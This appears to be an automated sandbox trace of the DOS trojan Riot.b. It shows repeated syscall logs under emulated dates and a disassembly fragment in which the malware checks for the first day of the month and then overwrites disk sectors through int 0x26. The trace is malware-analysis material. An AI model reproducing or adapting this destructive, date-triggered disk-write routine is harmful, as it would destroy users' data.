Sample viewer

vx.netlux.org/Trojan.DOS.Riot.b

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:35:33.478951311Z 51 PC: 12a5b | Get or set Ctrl-Break
2018-12-17T22:35:33.480572354Z 51 PC: 12a63 | Get or set Ctrl-Break
2018-12-17T22:35:33.481402006Z 53 PC: 12a68 | Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-17T22:35:33.482467933Z 37 PC: 12a74 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-17T22:35:33.484638929Z 26 PC: 12a7c | Set disk transfer address
2018-12-17T22:35:33.485708925Z 59 PC: 12a9e | Change current directory
2018-12-17T22:35:33.489721019Z 87 PC: 12aa5 | Get or set file date and time
2018-12-17T22:35:33.497206544Z 62 PC: 12aa9 | Close file
2018-12-17T22:35:33.498723938Z 42 PC: 12ab2 | Get date
0x12ab2: cmp dl, 1
0x12ab5: je 0x12ab9
0x12ab7: jmp 0x12ad6
0x12ab9: cli
0x12aba: mov ah, 2
0x12abc: cdq
0x12abd: mov cx, 0x100
0x12ac0: int 0x26
0x12ac2: jmp 0x12ac4
0x12ac4: mov al, 3
0x12ac6: mov cx, 0x700
0x12ac9: mov dx, 0
0x12acc: mov ds, word ptr [di + 0x99]
0x12ad0: mov bx, word ptr [di + 0x55]
0x12ad3: call 0x22ab9
0x12ad6: mov dx, word ptr [bp + 0x1b6]
0x12ada: mov ax, 0x4301
0x12add: int 0x21
0x12adf: ret
0x12ae0: mov ax, 0x4200
2018-12-17T22:35:33.500986324Z 67 PC: 12adf | Get or set file attributes

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":6407,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:59:18.145835432Z 51 PC: 12a5b | Get or set Ctrl-Break
2018-12-25T11:59:18.147127826Z 51 PC: 12a63 | Get or set Ctrl-Break
2018-12-25T11:59:18.148005285Z 53 PC: 12a68 | Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:59:18.150039489Z 37 PC: 12a74 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:59:18.15236697Z 26 PC: 12a7c | Set disk transfer address
2018-12-25T11:59:18.165476893Z 59 PC: 12a9e | Change current directory
2018-12-25T11:59:18.169318838Z 87 PC: 12aa5 | Get or set file date and time
2018-12-25T11:59:18.171081631Z 62 PC: 12aa9 | Close file
2018-12-25T11:59:18.172775774Z 42 PC: 12ab2 | Get date
0x12ab2: cmp dl, 1
0x12ab5: je 0x12ab9
0x12ab7: jmp 0x12ad6
0x12ab9: cli
0x12aba: mov ah, 2
0x12abc: cdq
0x12abd: mov cx, 0x100
0x12ac0: int 0x26
0x12ac2: jmp 0x12ac4
0x12ac4: mov al, 3
0x12ac6: mov cx, 0x700
0x12ac9: mov dx, 0
0x12acc: mov ds, word ptr [di + 0x99]
0x12ad0: mov bx, word ptr [di + 0x55]
0x12ad3: call 0x22ab9
0x12ad6: mov dx, word ptr [bp + 0x1b6]
0x12ada: mov ax, 0x4301
0x12add: int 0x21
0x12adf: ret
0x12ae0: mov ax, 0x4200

{"DateBased":true,"Day":2,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":6407,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:59:18.794436329Z 51 PC: 12a5b | Get or set Ctrl-Break
2018-12-25T11:59:18.795891088Z 51 PC: 12a63 | Get or set Ctrl-Break
2018-12-25T11:59:18.796709278Z 53 PC: 12a68 | Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:59:18.797648441Z 37 PC: 12a74 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:59:18.799346507Z 26 PC: 12a7c | Set disk transfer address
2018-12-25T11:59:18.800517126Z 59 PC: 12a9e | Change current directory
2018-12-25T11:59:18.804472814Z 87 PC: 12aa5 | Get or set file date and time
2018-12-25T11:59:18.806282893Z 62 PC: 12aa9 | Close file
2018-12-25T11:59:18.807654477Z 42 PC: 12ab2 | Get date
0x12ab2: cmp dl, 1
0x12ab5: je 0x12ab9
0x12ab7: jmp 0x12ad6
0x12ab9: cli
0x12aba: mov ah, 2
0x12abc: cdq
0x12abd: mov cx, 0x100
0x12ac0: int 0x26
0x12ac2: jmp 0x12ac4
0x12ac4: mov al, 3
0x12ac6: mov cx, 0x700
0x12ac9: mov dx, 0
0x12acc: mov ds, word ptr [di + 0x99]
0x12ad0: mov bx, word ptr [di + 0x55]
0x12ad3: call 0x22ab9
0x12ad6: mov dx, word ptr [bp + 0x1b6]
0x12ada: mov ax, 0x4301
0x12add: int 0x21
0x12adf: ret
0x12ae0: mov ax, 0x4200
2018-12-25T11:59:18.809644543Z 67 PC: 12adf | Get or set file attributes